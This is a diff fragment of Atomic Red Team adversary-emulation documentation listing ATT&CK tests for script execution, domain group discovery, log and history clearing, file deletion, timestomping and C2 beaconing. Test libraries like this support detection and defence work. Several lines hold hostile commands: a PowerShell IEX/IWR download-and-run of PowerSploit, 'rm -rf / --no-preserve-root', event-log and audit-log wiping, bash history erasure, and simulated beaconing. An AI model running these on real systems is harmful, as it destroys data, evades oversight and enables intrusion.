## Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments
auto_generated_guid: 1c0a870f-dc74-49cf-9afc-eccc45e58790
Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied
**Supported Platforms:** Windows
**auto_generated_guid:** 1c0a870f-dc74-49cf-9afc-eccc45e58790
#### Inputs:
@@ -643,13 +675,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
<br/>
## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
auto_generated_guid: 86a43bad-12e3-4e85-b97c-4d5cf25b95c3
Executes powershell.exe with variations of the -EncodedCommand parameter
**Supported Platforms:** Windows
**auto_generated_guid:** 86a43bad-12e3-4e85-b97c-4d5cf25b95c3
#### Inputs:
@@ -689,13 +723,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
<br/>
## Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments
auto_generated_guid: 0d181431-ddf3-4826-8055-2dbf63ae848b
Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied
**Supported Platforms:** Windows
**auto_generated_guid:** 0d181431-ddf3-4826-8055-2dbf63ae848b
#### Inputs:
atomics/T1059.002/T1059.002.md
+5 -3
View File
@@ -16,16 +16,18 @@ Adversaries may abuse AppleScript to execute various behaviors, such as interact
<br/>
## Atomic Test #1 - AppleScript
auto_generated_guid: 3600d97d-81b9-4171-ab96-e4386506e2c2
Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit.
You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request.
Reference: https://github.com/EmpireProject/Empire
**Supported Platforms:** macOS
**auto_generated_guid:** 3600d97d-81b9-4171-ab96-e4386506e2c2
atomics/T1059.003/T1059.003.md
+10 -6
View File
@@ -16,13 +16,15 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu
<br/>
## Atomic Test #1 - Create and Execute Batch Script
auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388
Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again.
**Supported Platforms:** Windows
**auto_generated_guid:** 9e8894c0-50bd-4525-a96c-d4ac78ece388
#### Inputs:
@@ -65,13 +67,15 @@ Set-Content -Path #{script_path} -Value "#{command_to_execute}"
<br/>
## Atomic Test #2 - Writes text to a file and displays it.
auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e
Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.
**Supported Platforms:** Windows
**auto_generated_guid:** 127b4afe-2346-4192-815c-69042bec570e
#### Inputs:
atomics/T1059.004/T1059.004.md
+10 -6
View File
@@ -16,13 +16,15 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
<br/>
## Atomic Test #1 - Create and Execute Bash Shell Script
auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
Creates and executes a simple bash script.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
#### Inputs:
@@ -54,15 +56,17 @@ rm #{script_path}
<br/>
## Atomic Test #2 - Command-Line Interface
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c
atomics/T1059.005/T1059.005.md
+15 -9
View File
@@ -18,15 +18,17 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
<br/>
## Atomic Test #1 - Visual Basic script execution to gather local computer information
auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9
Visual Basic execution test, execute vbscript via PowerShell.
When successful, system information will be written to $env:TEMP\T1059.005.out.txt.
**Supported Platforms:** Windows
**auto_generated_guid:** 1620de42-160a-4fe5-bbaf-d3fef0181ce9
#### Inputs:
@@ -70,17 +72,19 @@ Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
<br/>
## Atomic Test #2 - Encoded VBS code execution
auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
You can validate this by opening WinWord -> File -> Account -> About Word
**Supported Platforms:** Windows
**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
@@ -123,15 +127,17 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
<br/>
## Atomic Test #3 - Extract Memory via VBA
auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.
**Supported Platforms:** Windows
**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6
#### Inputs:
atomics/T1059.006/T1059.006.md
+15 -9
View File
@@ -16,13 +16,15 @@ Python comes with many built-in packages to interact with the underlying system,
<br/>
## Atomic Test #1 - Execute shell script via python's command mode arguement
auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
Download and execute shell script and write to file then execute locally using Python -c (command mode)
**Supported Platforms:** Linux
**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
#### Inputs:
@@ -67,13 +69,15 @@ pip install requests
<br/>
## Atomic Test #2 - Execute Python via scripts (Linux)
auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
Create Python file (.py) that downloads and executes shell script via executor arguments
**Supported Platforms:** Linux
**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
#### Inputs:
@@ -129,13 +133,15 @@ pip install requests
<br/>
## Atomic Test #3 - Execute Python via Python executables (Linux)
auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
**Supported Platforms:** Linux
**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
#### Inputs:
atomics/T1069.001/T1069.001.md
+15 -9
View File
@@ -16,13 +16,15 @@ Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.o
<br/>
## Atomic Test #1 - Permission Groups Discovery (Local)
auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae
Permission Groups Discovery
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae
@@ -44,14 +46,16 @@ if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from
<br/>
## Atomic Test #2 - Basic Permission Groups Discovery Windows (Local)
auto_generated_guid: 1f454dd6-e134-44df-bebb-67de70fb6cd8
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 1f454dd6-e134-44df-bebb-67de70fb6cd8
@@ -72,14 +76,16 @@ net localgroup "Administrators"
<br/>
## Atomic Test #3 - Permission Groups Discovery PowerShell (Local)
auto_generated_guid: a580462d-2c19-4bc7-8b9a-57a41b7d3ba4
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** a580462d-2c19-4bc7-8b9a-57a41b7d3ba4
atomics/T1069.002/T1069.002.md
+40 -24
View File
@@ -26,14 +26,16 @@ Commands such as <code>net group /domain</code> of the [Net](https://attack.mitr
<br/>
## Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)
auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** dd66d77d-8998-48c0-8024-df263dc2ce5d
@@ -56,14 +58,16 @@ net group "enterprise admins" /domain
<br/>
## Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)
auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
#### Inputs:
@@ -88,14 +92,16 @@ get-ADPrincipalGroupMembership #{user} | select name
<br/>
## Atomic Test #3 - Elevated group enumeration using net group (Domain)
auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 0afb5163-8181-432e-9405-4322710c0c37
@@ -118,13 +124,15 @@ net group "BUILTIN\Backup Operators" /doma
<br/>
## Atomic Test #4 - Find machines where user has local admin access (PowerView)
auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** a2d71eee-a353-4232-9f86-54f4288dd8c1
@@ -145,13 +153,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
<br/>
## Atomic Test #5 - Find local admins on all machines in domain (PowerView)
auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
@@ -172,13 +182,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
<br/>
## Atomic Test #6 - Find Local Admins via Group Policy (PowerView)
auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a
takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 64fdb43b-5259-467a-b000-1b02c00e510a
#### Inputs:
@@ -204,13 +216,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
<br/>
## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)
auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
When successful, accounts that do not require kerberos pre-auth will be returned
**Supported Platforms:** Windows
**auto_generated_guid:** 870ba71e-6858-4f6d-895c-bb6237f6121b
@@ -251,14 +265,16 @@ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.
<br/>
## Atomic Test #8 - Adfind - Query Active Directory Groups
auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** 48ddc687-82af-40b7-8472-ff1e742e8274
#### Inputs:
atomics/T1070.001/T1070.001.md
+15 -9
View File
@@ -22,13 +22,15 @@ These logs may also be cleared through other mechanisms, such as the event viewe
<br/>
## Atomic Test #1 - Clear Logs
auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967
Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
**Supported Platforms:** Windows
**auto_generated_guid:** e6abb60e-26b8-41da-8aae-0c35174b0967
#### Inputs:
@@ -53,15 +55,17 @@ wevtutil cl #{log_name}
<br/>
## Atomic Test #2 - Delete System Logs Using Clear-EventLog
auto_generated_guid: b13e9306-3351-4b4b-a6e8-477358b0b498
Clear event logs using built-in PowerShell commands.
Upon successful execution, you should see the list of deleted event logs
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
**Supported Platforms:** Windows
**auto_generated_guid:** b13e9306-3351-4b4b-a6e8-477358b0b498
@@ -83,15 +87,17 @@ Get-EventLog -list
<br/>
## Atomic Test #3 - Clear Event Logs via VBA
auto_generated_guid: 1b682d84-f075-4f93-9a89-8a8de19ffd6e
This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system.
Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error
**Supported Platforms:** Windows
**auto_generated_guid:** 1b682d84-f075-4f93-9a89-8a8de19ffd6e
atomics/T1070.002/T1070.002.md
+15 -9
View File
@@ -23,13 +23,15 @@
<br/>
## Atomic Test #1 - rm -rf
auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
Delete system and audit logs
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 989cc1b1-3642-4260-a809-54f9dd559683
@@ -50,13 +52,15 @@ sudo rm -rf /private/var/audit/*
<br/>
## Atomic Test #2 - Overwrite Linux Mail Spool
auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
**auto_generated_guid:** 1602ff76-ed7f-4c94-b550-2f727b4782d4
#### Inputs:
@@ -81,13 +85,15 @@ echo 0> /var/spool/mail/#{username}
<br/>
## Atomic Test #3 - Overwrite Linux Log
auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5
This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
**auto_generated_guid:** d304b2dc-90b4-4465-a650-16ddd503f7b5
#### Inputs:
atomics/T1070.003/T1070.003.md
+55 -33
View File
@@ -40,13 +40,15 @@ Adversaries may run the PowerShell command <code>Clear-History</code> to flush t
<br/>
## Atomic Test #1 - Clear Bash history (rm)
auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc
Clears bash history via rm
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** a934276e-2be5-4a36-93fd-98adbb5bd4fc
@@ -66,13 +68,15 @@ rm ~/.bash_history
<br/>
## Atomic Test #2 - Clear Bash history (echo)
auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11
Clears bash history via rm
**Supported Platforms:** Linux
**auto_generated_guid:** cbf506a5-dd78-43e5-be7e-a46b7c7a0a11
@@ -92,13 +96,15 @@ echo "" > ~/.bash_history
<br/>
## Atomic Test #3 - Clear Bash history (cat dev/null)
auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f
Clears bash history via cat /dev/null
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** b1251c35-dcd3-4ea1-86da-36d27b54f31f
@@ -118,13 +124,15 @@ cat /dev/null > ~/.bash_history
<br/>
## Atomic Test #4 - Clear Bash history (ln dev/null)
auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914
Clears bash history via a symlink to /dev/null
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 23d348f3-cc5c-4ba9-bd0a-ae09069f0914
@@ -144,13 +152,15 @@ ln -sf /dev/null ~/.bash_history
<br/>
## Atomic Test #5 - Clear Bash history (truncate)
auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739
Clears bash history via truncate
**Supported Platforms:** Linux
**auto_generated_guid:** 47966a1d-df4f-4078-af65-db6d9aa20739
@@ -170,13 +180,15 @@ truncate -s0 ~/.bash_history
<br/>
## Atomic Test #6 - Clear history of a bunch of shells
auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c
Clears the history of a bunch of different shell types by setting the history size to zero
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 7e6721df-5f08-4370-9255-f06d8a77af4c
@@ -198,13 +210,15 @@ history -c
<br/>
## Atomic Test #7 - Clear and Disable Bash History Logging
auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6
Clears the history and disable bash history logging of the current shell and future shell sessions
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 784e4011-bd1a-4ecd-a63a-8feb278512e6
@@ -233,13 +247,15 @@ set -o history
<br/>
## Atomic Test #8 - Use Space Before Command to Avoid Logging to History
auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6
Using a space before a command causes the command to not be logged in the Bash History file
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 53b03a54-4529-4992-852d-a00b4b7215a6
@@ -260,13 +276,15 @@ whoami
<br/>
## Atomic Test #9 - Disable Bash History Logging with SSH -T
auto_generated_guid: 5f8abd62-f615-43c5-b6be-f780f25790a1
Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
**Supported Platforms:** Linux
**auto_generated_guid:** 5f8abd62-f615-43c5-b6be-f780f25790a1
@@ -304,13 +322,15 @@ yum -y install sshpass
<br/>
## Atomic Test #10 - Prevent Powershell History Logging
auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370
Prevents Powershell history
**Supported Platforms:** Windows
**auto_generated_guid:** 2f898b81-3e97-4abb-bc3f-a95138988370
@@ -334,13 +354,15 @@ Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
<br/>
## Atomic Test #11 - Clear Powershell History by Deleting History File
auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037
Clears Powershell history
**Supported Platforms:** Windows
**auto_generated_guid:** da75ae8d-26d6-4483-b0fe-700e4df4f037
atomics/T1070.004/T1070.004.md
+50 -30
View File
@@ -30,13 +30,15 @@ There are tools available from the host operating system to perform cleanup, but
<br/>
## Atomic Test #1 - Delete a single file - Linux/macOS
auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480
Delete a single file from the temporary directory
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480
#### Inputs:
@@ -61,13 +63,15 @@ rm -f #{file_to_delete}
<br/>
## Atomic Test #2 - Delete an entire folder - Linux/macOS
auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e
Recursively delete the temporary directory and all files contained within it
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e
#### Inputs:
@@ -92,13 +96,15 @@ rm -rf #{folder_to_delete}
<br/>
## Atomic Test #3 - Overwrite and delete a file with shred
auto_generated_guid: 039b4b10-2900-404b-b67f-4b6d49aa6499
Use the `shred` command to overwrite the temporary file and then delete it
**Supported Platforms:** Linux
**auto_generated_guid:** 039b4b10-2900-404b-b67f-4b6d49aa6499
#### Inputs:
@@ -123,14 +129,16 @@ shred -u #{file_to_shred}
<br/>
## Atomic Test #4 - Delete a single file - Windows cmd
auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3
Delete a single file from the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
**auto_generated_guid:** 861ea0b4-708a-4d17-848d-186c9c7f17e3
#### Inputs:
@@ -167,14 +175,16 @@ echo deleteme_T1551.004 >> #{file_to_delete}
<br/>
## Atomic Test #5 - Delete an entire folder - Windows cmd
auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698
Recursively delete a folder in the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
**auto_generated_guid:** ded937c4-2add-42f7-9c2c-c742b7a98698
#### Inputs:
@@ -211,13 +221,15 @@ mkdir #{folder_to_delete}
<br/>
## Atomic Test #6 - Delete a single file - Windows PowerShell
auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
**auto_generated_guid:** 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
#### Inputs:
@@ -254,13 +266,15 @@ New-Item -Path #{file_to_delete} | Out-Null
<br/>
## Atomic Test #7 - Delete an entire folder - Windows PowerShell
auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1
Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
**auto_generated_guid:** edd779e4-a509-4cba-8dfa-a112543dbfb1
#### Inputs:
@@ -297,13 +311,15 @@ New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
<br/>
## Atomic Test #8 - Delete Filesystem - Linux
auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
**Supported Platforms:** Linux
**auto_generated_guid:** f3aa95fe-4f10-4485-ad26-abf22a764c52
@@ -323,14 +339,16 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
<br/>
## Atomic Test #9 - Delete Prefetch File
auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count"
before and after the test to verify that the number of prefetch files decreases by 1.
**Supported Platforms:** Windows
**auto_generated_guid:** 36f96049-0ad7-4a5f-8418-460acaeb92fb
@@ -350,17 +368,19 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
<br/>
## Atomic Test #10 - Delete TeamViewer Log Files
auto_generated_guid: 69f50a5f-967c-4327-a5bb-e1a9a9983785
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
https://twitter.com/SBousseaden/status/1197524463304290305?s=20
**Supported Platforms:** Windows
**auto_generated_guid:** 69f50a5f-967c-4327-a5bb-e1a9a9983785
#### Inputs:
atomics/T1070.005/T1070.005.md
+15 -9
View File
@@ -14,13 +14,15 @@
<br/>
## Atomic Test #1 - Add Network Share
auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131
Add a Network Share utilizing the command_prompt
**Supported Platforms:** Windows
**auto_generated_guid:** 14c38f32-6509-46d8-ab43-d53e32d2b131
#### Inputs:
@@ -46,13 +48,15 @@ net share test=#{share_name} /REMARK:"test share" /CACHE:No
<br/>
## Atomic Test #2 - Remove Network Share
auto_generated_guid: 09210ad5-1ef2-4077-9ad3-7351e13e9222
Removes a Network Share utilizing the command_prompt
**Supported Platforms:** Windows
**auto_generated_guid:** 09210ad5-1ef2-4077-9ad3-7351e13e9222
#### Inputs:
@@ -77,13 +81,15 @@ net share #{share_name} /delete
<br/>
## Atomic Test #3 - Remove Network Share PowerShell
auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3
Removes a Network Share utilizing PowerShell
**Supported Platforms:** Windows
**auto_generated_guid:** 0512d214-9512-4d22-bde7-f37e058259b3
#### Inputs:
atomics/T1070.006/T1070.006.md
+40 -24
View File
@@ -26,13 +26,15 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr
<br/>
## Atomic Test #1 - Set a file's access timestamp
auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810
Stomps on the access timestamp of a file
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810
#### Inputs:
@@ -57,13 +59,15 @@ touch -a -t 197001010000.00 #{target_filename}
<br/>
## Atomic Test #2 - Set a file's modification timestamp
auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52
Stomps on the modification timestamp of a file
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52
#### Inputs:
@@ -88,16 +92,18 @@ touch -m -t 197001010000.00 #{target_filename}
<br/>
## Atomic Test #3 - Set a file's creation timestamp
auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
Stomps on the create timestamp of a file
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
#### Inputs:
@@ -126,15 +132,17 @@ stat #{target_filename}
<br/>
## Atomic Test #4 - Modify file timestamps using reference file
auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50
Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50
#### Inputs:
@@ -160,14 +168,16 @@ touch -acmr #{reference_file_path} #{target_file_path}
<br/>
## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell
auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c
Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
**Supported Platforms:** Windows
**auto_generated_guid:** b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c
#### Inputs:
@@ -210,14 +220,16 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
<br/>
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell
auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2
Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
**Supported Platforms:** Windows
**auto_generated_guid:** f8f6634d-93e1-4238-8510-f8a90a20dcf2
#### Inputs:
@@ -260,14 +272,16 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
<br/>
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell
auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62
Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
**Supported Platforms:** Windows
**auto_generated_guid:** da627f63-b9bd-4431-b6f8-c5b44d061a62
#### Inputs:
@@ -310,17 +324,19 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
<br/>
## Atomic Test #8 - Windows - Timestomp a File
auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43
Timestomp kxwn.lock.
Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file.
[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)
**Supported Platforms:** Windows
**auto_generated_guid:** d7512c33-3a75-4806-9893-69abc3ccdd43
#### Inputs:
atomics/T1070/T1070.md
+5 -3
View File
@@ -12,14 +12,16 @@ These actions may interfere with event collection, reporting, or other notificat
<br/>
## Atomic Test #1 - Indicator Removal using FSUtil
auto_generated_guid: b4115c7a-0e92-47f0-a61e-17e7218b2435
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output
will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
**Supported Platforms:** Windows
**auto_generated_guid:** b4115c7a-0e92-47f0-a61e-17e7218b2435
atomics/T1071.001/T1071.001.md
+15 -9
View File
@@ -16,16 +16,18 @@ Protocols such as HTTP and HTTPS that carry web traffic may be very common in en
<br/>
## Atomic Test #1 - Malicious User Agents - Powershell
auto_generated_guid: 81c13829-f6c9-45b8-85a6-053366d55297
This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
**auto_generated_guid:** 81c13829-f6c9-45b8-85a6-053366d55297
#### Inputs:
@@ -53,16 +55,18 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
<br/>
## Atomic Test #2 - Malicious User Agents - CMD
auto_generated_guid: dc3488b0-08c7-4fea-b585-905c83b48180
This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
**auto_generated_guid:** dc3488b0-08c7-4fea-b585-905c83b48180
#### Inputs:
@@ -107,14 +111,16 @@ Remove-Item $env:temp\curl.zip
<br/>
## Atomic Test #3 - Malicious User Agents - Nix
auto_generated_guid: 2d7c471a-e887-4b78-b0dc-b0df1f2e0658
This test simulates an infected host beaconing to command and control.
